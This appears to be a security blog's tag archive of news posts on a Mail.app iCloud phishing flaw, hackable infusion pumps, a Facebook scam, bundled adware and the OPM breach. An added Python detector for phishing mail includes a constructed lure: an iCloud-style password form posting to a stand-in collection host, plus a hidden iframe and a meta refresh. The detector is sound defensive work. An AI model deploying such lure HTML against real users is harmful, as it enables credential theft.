Tag Archives: Threats

Flaw in Mail.app Can Be Used to Hijack iCloud Password

The flaw lies in Mail.app, Apple's default e-mail program for iOS. According to security researcher Jan Souček, “this bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password “collector” using simple HTML and CSS.” To reduce suspicion the code even uses cookies to detect whether someone has already visited the page; if so, it stops displaying the password prompt.

This means that hackers could easily create phishing mails which show a form that looks exactly like the iCloud login pop-up window everyone knows. The user would be asked for their username and password, which – once entered – would then be transmitted to the cybercriminals. Just take a look at the below proof-of-concept video to see how easy it would be to trick the unsuspecting user!
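The post describes a collector built from nothing but HTML and CSS: remote content replaces the message body and a form that mimics the iCloud prompt captures the password. The following is an added example, not code from the post or from the researcher's proof of concept, showing how a mail gateway could flag an HTML message that carries those ingredients. The post does not say which HTML construct the bug abuses, so the list of remote-content loaders checked here (iframe, object, embed, meta refresh, remote stylesheet) is a general heuristic chosen for this example, and the two sample message bodies and the example.invalid URLs are constructed.

```python
import re
from html.parser import HTMLParser

# Tags that can pull remote content into a rendered message, with the attribute
# that carries the URL. Heuristic list chosen for this example (assumption).
REMOTE_LOADERS = {"iframe": "src", "frame": "src", "object": "data", "embed": "src"}
REMOTE_SCHEMES = ("http://", "https://")


class MailHtmlAuditor(HTMLParser):
    """Collect (kind, value) findings for the building blocks a script-free
    credential collector needs: remote content loading, a form, a password field."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag in REMOTE_LOADERS:
            target = a.get(REMOTE_LOADERS[tag], "")
            if target.lower().startswith(REMOTE_SCHEMES):
                self.findings.append((tag, target))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "0; url=https://..." in a refresh redirect
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m and m.group(1).lower().startswith(REMOTE_SCHEMES):
                self.findings.append(("meta-refresh", m.group(1)))
        elif tag == "link" and "stylesheet" in a.get("rel", "").lower():
            href = a.get("href", "")
            if href.lower().startswith(REMOTE_SCHEMES):
                self.findings.append(("remote-stylesheet", href))
        elif tag == "form":
            self.findings.append(("form", a.get("action", "")))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append(("password-input", a.get("name", "")))


def audit_mail_html(body):
    """Return the list of (kind, value) findings for one HTML message body."""
    parser = MailHtmlAuditor()
    parser.feed(body)
    parser.close()
    return parser.findings


def classify(findings):
    """Reduce findings to one verdict a gateway can act on."""
    kinds = {kind for kind, _ in findings}
    loaders = set(REMOTE_LOADERS) | {"meta-refresh", "remote-stylesheet"}
    loads_remote = bool(kinds & loaders)
    if "password-input" in kinds and ("form" in kinds or loads_remote):
        return "credential-prompt"   # login form delivered by e-mail: quarantine
    if loads_remote:
        return "remote-content"      # body can change after delivery: flag for review
    return "clean"


# Constructed sample: a lure whose body is replaced by remote content and which
# shows a password prompt without any JavaScript.
SAMPLE_LURE = """<html><body>
<meta http-equiv="refresh" content="0; url=https://example.invalid/lure">
<iframe src="https://example.invalid/frame" width="0" height="0"></iframe>
<p>Your iCloud storage is almost full. Sign in to review your plan.</p>
<form action="https://example.invalid/collect" method="post">
  <input type="text" name="appleid">
  <input type="password" name="pw">
  <input type="submit" value="Sign In">
</form>
</body></html>"""

# Constructed sample: an ordinary message with a plain link.
SAMPLE_BENIGN = """<html><body>
<p>Hi, the agenda for Thursday is linked below.</p>
<a href="https://example.invalid/agenda">Agenda</a>
</body></html>"""


if __name__ == "__main__":
    for name, body in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        findings = audit_mail_html(body)
        print(name, classify(findings), findings)
```

The verdict deliberately keys on the combination the post describes (a password field together with a form or remotely loaded content) rather than on any single tag, since legitimate newsletters often load remote images while almost never asking for a password inside the message itself.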

Souček discovered the flaw in January 2015 and informed Apple immediately. Since then no action has been taken to fix the vulnerability. In the hope that it will make Apple take the bug more seriously, the security researcher has now published his findings together with a proof-of-concept video and the corresponding code.

Feel free to follow this link in order to find out more about the issue.

The post Flaw in Mail.app Can Be Used to Hijack iCloud Password appeared first on Avira Blog.

Homicide no longer requires proximity

Although computerized hospital pumps are widely known to be beneficial for mitigating dosage errors, news of hackable hospital pumps came to public attention a few months ago when security researcher Billy Rios discovered a pump that doesn’t use authentication for its drug library – thus enabling a hacker to load a different library into the device, which in theory could lead to a deadly dose being delivered. But new findings by Rios indicate that hackers may now themselves be able to remotely administer a deadly dose of a drug to a patient.

The Vulnerabilities

According to Rios’s findings, a hacker could alter – from within the hospital computer network or even over the Internet – the allowable upper dosage limit to give either too low or too high a dose. Doctors or nurses could then accidentally set the machine to give too high or low a dose without the machine issuing an alert.

When the story initially broke, altering the dosage limits was not considered as severe a vulnerability as a hacker being able to set the dosage amount himself (remotely). Now, however, Rios has found a new vulnerability that would allow hackers to remotely set the dosage amount by altering the firmware to gain total control of the device.

Coupling the previously known ability to change the drug library data with the newly found ability to remotely set the amount of the dose, a hacker can now potentially deliver a lethal dose of medication.

Pervasiveness of the Problem

How widespread the vulnerabilities are is not yet known, but even counting only the one manufacturer in whose pumps Rios discovered them, close to half a million intravenous medicine pumps globally could be affected.

Naïvety or Denial?

When Rios initially notified the company making the pumps in question, that its pumps could have their firmware changed by hackers, the company insisted that the pumps are safe because of partitioning between the comms module and motherboard. Rios found that, while the physical partition does exist, a serial cable connects the two components “in a way that you can actually change the core software on the pump.”

As the company uses this same approach for remotely delivering firmware updates to its computerized pumps, it is unclear why any computerized-equipment maker would be so skeptical of its own methods being used by hackers. Regardless, while the company works on a proof-of-concept that its devices have no vulnerabilities, Rios is working on his own proof-of-concept to the contrary, which he plans to share during the 2015 SummerCon security conference in Brooklyn.

“You can talk to that communication module over the network or over a wireless network,” Rios told Wired (read the full Wired report here).


Alton Towers Facebook Scam

Following an accident at Alton Towers – a theme and water park in the United Kingdom, a Facebook scam has emerged that purports to show video footage of the accident. Beware: this is a scam, which we shall now dissect for you.

Step 1: The hook

Alton Towers - step 1 the hook

This teaser Facebook post is supposedly taken from the accident (it is not). If you click on it with the (macabre) hope of seeing a video of the crash, you will be taken to a website that has been designed to look just like YouTube.

Step 2: The fake look-alike

Alton Towers fake youtube

Once on that page, you will be asked to post a link to the video on your Facebook timeline…

Step 3: The redirect

Once you accept to post the video to Facebook, you will be redirected to another website, where you will be told that to finally see that video, you need to download a video player update…

Alton Towers - step 3 the redirect

The downloaded file contains adware that displays advertisements and collects information about your browsing habits. The crooks almost certainly make money by getting a percentage of all sales on these third-party ads you will be seeing in your browser.

If you see this Alton Towers scam on Facebook, avoid it. If you click on a post that tells you to download a plugin or update to watch the video, exit the page immediately. And for additional security, use Avira Free Antivirus, which blocks adware.


Opt-out from Potentially Unwanted Applications

This new Avira video will bring back the memories and will show you why it’s important to pay close attention all throughout the installation process of every new program on your device.

Do you know what’s in the bundle?

Potentially Unwanted Applications are usually more or less hidden in software bundles. In other words, while you are under the impression of installing only one program on your computer, you are in fact agreeing to install additional services that can seriously disrupt your everyday use of the device.

Your computer will be slower than ever, unfamiliar programs will appear on your desktop and your browser will make you feel like it’s Christmas every day: pop-ups, ads… not to mention a collection of useless toolbars. Not exactly the kind of surprises that would be welcomed in the most wonderful time of the year but just as colored, noisy and cheerful.

Whenever you are planning to install new programs on your computer, make sure to read carefully through the terms and conditions of the agreement and opt out of any step that would install potentially unwanted applications in the process.

Sometimes, protecting your computer is as simple as that: unchecking the right boxes at the right time.

As a security company, many of our efforts have been directed towards stopping potentially unwanted applications from spreading. Earlier this year we released a new set of ethical guidelines for all vendors and distribution partners to respect, shortly after our CEO, Travis Witteveen, wrote on our blog about the dangers associated with PUAs. We’re doing everything possible to protect you from any kind of digital threat, so make sure you are fully aware of all digital risks associated with software downloads and stay safe.


OPM Data Breach: Data of 4 Million Federal Workers Exposed

According to the official news release, hackers managed to breach the Office of Personnel Management (OPM). With the information of 4 million federal government workers exposed, it is one of the biggest in the federal government’s history. The hack was discovered because “within the last year, the OPM has undertaken an aggressive effort to update its cybersecurity posture, adding numerous tools and capabilities to its networks”.

In order to determine the full impact the OPM is now investigating the issue together with the U.S. Department of Homeland Security’s Computer Emergency Readiness Team (US-CERT) and the Federal Bureau of Investigation (FBI).

In their statement the agency wrote: “Since the intrusion, OPM has instituted additional network security precautions, including: restricting remote access for network administrators and restricting network administration functions remotely; a review of all connections to ensure that only legitimate business connections have access to the internet; and deploying anti-malware software across the environment to protect and prevent the deployment or execution of tools that could compromise the network.”

Sounds all good, but who is to blame? According to The Washington Post and the Wall Street Journal the hackers might have been Chinese, a link that China’s Foreign Ministry Spokesman calls “irresponsible”.
